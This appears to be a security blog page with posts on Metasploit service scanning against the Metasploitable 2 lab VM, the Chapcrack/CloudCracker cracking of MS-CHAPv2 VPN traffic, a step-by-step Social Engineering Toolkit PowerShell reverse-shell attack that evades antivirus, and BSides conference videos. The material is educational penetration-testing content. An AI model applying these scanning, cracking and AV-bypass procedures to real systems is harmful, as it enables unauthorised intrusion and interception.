Metasploitable 2.0 Tutorial Part 2: Scanning for Network Services with Metasploit

In our last Metasploitable tutorial we looked at scanning the system with Nmap looking for open ports and services. This time we will take a look at some of the built in auxiliary scanners that come with Metasploit. These scanners let us search and recover service information from a single computer or an entire network!

So let’s get started! (As usual these techniques are for security professionals. Do not attempt to access systems that you do not own or have permission to do so, and do not use production systems to learn these techniques)

Lets get started, for this tutorial we again will be using our Backtrack 5 system as the testing platform and the purposefully vulnerable Metasploitable 2 virtual machine as our target system.

Runing our nmap scan produced a huge amount of open ports for us to pick and choose from. What many people don’t know is that Metasploit comes with a substantial amount of built in scanners.

Run “msfconsole” from a Backtrack command prompt. Then type “search scanner” at the prompt:

msf > search scanner

Read down through the massive list to see what is available. For this tutorial let’s focus on the ports that we found open. Let’s search for only ssh scanners:

Notice that several are available, we are just looking for version information for now, so we will use that one. Simply “use” the program, then “show options” to see what options you can use. In this case all we set was the “RHOSTS name” or remote host, which is our target.

Then just type “exploit” to run:

We see that our target is indeed running an SSH server and we see what version of the software is operating.

Some of the scanners are more helpful than others, for example, if we use the Mysql scan we get this:

The full version of MySQL that is running. But others aren’t quite as helpful, let’s look at Telnet:

Hmm… Just looks like a banner grab with no hint as to what level of software is running. But it is proof that there is something there.

What is interesting too is that with these scanner programs we have different options that we can set. For instance, let’s run the SMB scanner:

Okay, we put in and it scanned it and returned the version of Samba that was running on it. But what if we wanted to scan the whole network for just systems running Samba. This is where the beauty of the RHOSTS command comes into play. Instead of just scanning the single host, let’s scan all 256 clients on the network.

We use the same exact command, but modify the RHOSTS command like so:

Notice now it scanned all 256 hosts on the network and found Samba running on our Metasploitable 2 machine at!

This makes things much easier if you are just scanning for certain services running on a network. I set the threads command too. I believe this comes set to “1” as default. If you are scanning a local LAN, you can bump this up to 255 to make it go faster, or up to 50 if testing a remote network.

Let’s use another scanner, this time let’s look for FTP servers running. We won’t scan for version information, though we could, let’s try the FTP anonymous scanner. This one scours a network and looks for FTP services that allow Read, Write or Both access to an anonymous user.

Just search for FTP scanner and use “ftp anonymous scanner”.

As you can see, this FTP server allows Read access to anonymous users. If would have been better if it also allowed write access, but this shows that we can check for certain vulnerabilities with the included scanners very easily.

Well, that’s it for this tutorial. Next time we will look at using information obtained from a scan to find and use a root level exploit on the Linux Metasploitable box!

(Want to learn a LOT more about penetration testing with Metasploit on the Backtrack platform? Check out the Bible of pentesting with Metasploit, “Metasploit: The Penetration Tester’s Guide“.)

Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic

For those of us who missed David Hulton and Moxie Marlinspike’s Defcon 20 presentation on cracking MS-CHAPv2, here is an overview:

1) All users and providers of PPTP VPN solutions should immediately start migrating to a different VPN protocol. PPTP traffic should be considered unencrypted.

2) Enterprises who are depending on the mutual authentication properties of MS-CHAPv2 for connection to their WPA2 Radius servers should immediately start migrating to something else.

That is all, have a nice day…

Wait a minute, “PPTP traffic should be considered unencrypted,” what???

A recently released article by Moxie explains in detail how they are able to crack MS-CHAPv2 communication, used in many PPTP based VPNs with a 100% success rate. But that is not all, the protocol is also used in WPA2 enterprise environments for connecting to Radius authentication servers.


When VPNs started to become popular I remember the constant mantra that remote VPN communication is safe because it uses PPTP, safely encapsulating your traffic before sending it over the web. Well, it looks like this may not be the case anymore.

From Moxie’s article the weakness lays in the user password hash and three DES keys used in the encoding operation:

“The hash we’re after, however, is used as the key material for three DES operations. DES keys are 7 bytes long, so each DES operation uses a 7 byte chunk of the MD4 hash output. This gives us an opportunity for a classic divide and conquer attack. Instead of brute forcing the MD4 hash output directly (a complexity of 2128), we can incrementally brute force 7 bytes of it at a time.

The keys come from the output of the MD4 of the password, which is only 16 bytes. Microsoft fills in the difference by padding the last key with zeros:

In doing so, this can significantly reduce the cracking time. Moxie created a tool called Chapcrack that will pull the necessary information from a network packet capture and cracks the third DES key. But this still leaves the first two DES keys, which could take a long time to crack.

Unless, that is, you take the output from Chapcrack and upload it to CloudCracker.

Cloudhacker is an online password cracking service that connects to a mean FPGA based box built by Pico Computing that they claim can crack any DES key within 24 hours:

“They were able to build an FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second. With 48 FPGAs, the Pico Computing DES cracking box gives us a worst case of ~23 hours for cracking a DES key, and an average case of about half a day.”

So basically, if you can get a network packet capture, you can use Chapcrack to pull the DES key from it, and then pass it to CloudCracker to crack it within 24 hours. Then you can decrypt the entire network packet capture, or login to the users VPN or radius server.


Looks like it is time to move on from MS-CHAPv2 based security products.

Social Engineering Toolkit: Bypassing Anti-Virus using Powershell

Just when it looked like Anti-Virus was getting the upper hand against the Social Engineering Toolkit…

At the Security Bsides conference in Cleveland, David Kennedy the author of SET, showed off some of the program’s new features. One is a very interesting way to get a remote shell by completely bypass Anti-Virus using a Windows Powershell attack. Let’s take a quick look at how this works.

  • Fire up SET and pick option number “1” Social Engineering Attacks
  • Select option “10” Powershell attack vector:

  • Next choose number 1, “Powershell Alphanumeric Shellcode Injector“:

Okay, now just enter the IP address of the Backtrack system and what port you want to use for the windows machine to connect in on. Usually the default, 443 is good enough. SET will now create the exploit code for 32 and 64 bit Windows:

Now that it is done, it gives you the option to start a listener. This sets up SET to receive incoming connections from Windows systems. For those familiar with Metasploit, this just starts the standard multi-handler for a reverse shell. Enter “yes” and pick if you want a 32 or 64 bit listener.

SET starts up Metasploit, runs the payload handler  and waits for an incoming connection:

All we need to do now is retrieve the Powershell code that SET created. The code is saved in SET’s Report/ Powershell directory

When you navigate to the directory, you will see both the 32 and 64 bit versions of the Powershell code. If a Windows system runs this code, a remote session will open up to the Backtrack machine. For this example, I will just copy the code:

and Paste it into a Windows 7 command prompt

Once you hit enter, a full remote shell session is created to the Backtrack SET machine:

Game over. The Windows 7 system in this instance was fully updated and had one of the best anti-virus/ internet security programs available. The AV didn’t see a thing.

Powershell is available on almost every Windows box nowadays, making this a very powerful attack. This is an amazing tool for pentesters, but as usual there are those who will try to use it for evil purposes.

Most likely, you would need to be tricked into running this for the attack to be successful. So as always, be very careful opening files and links from e-mails and social media messages. Run an internet browser script blocking program like “NoScript” to prevent code from automatically running from visited websites.

Also be very wary of shortened links, especially used on Twitter. Recently I saw a shortened link on Twitter that when unshrunk was a four line command to a malware server.

BSides Cleveland Security Conference Videos

If you don’t have the chance to get to the big security conferences, then you always look forward to the conference videos when they come out. July is no exception with several awesome conferences taking place. Adrian Crenshaw (aka Irongeek) has released links to all of the BSides Cleveland Security conference videos.

Below are two of my favorites.

First up is Dave Kennedy, mad hugger, and security guru extraordinaire, with a great look at some of his pentesting secrets and techniques. This is an excellent look at his Social Engineering Toolkit, tips on bypassing Anti-Virus, elevating a user to Admin account, and egress techniques.

Next up is “Pass the Hash like a Rockstar” by Martin “Purehate” Bos. This is a great look at different techniques used to compromise systems by using pass the hash. Kind of disappointing, this is not the talk he was going to do. He was going to do a speech on password cracking, which sounded really interesting, but he had to change it at the last moment. Hopefully he will release the intended speech at some point, but this talk is very good too!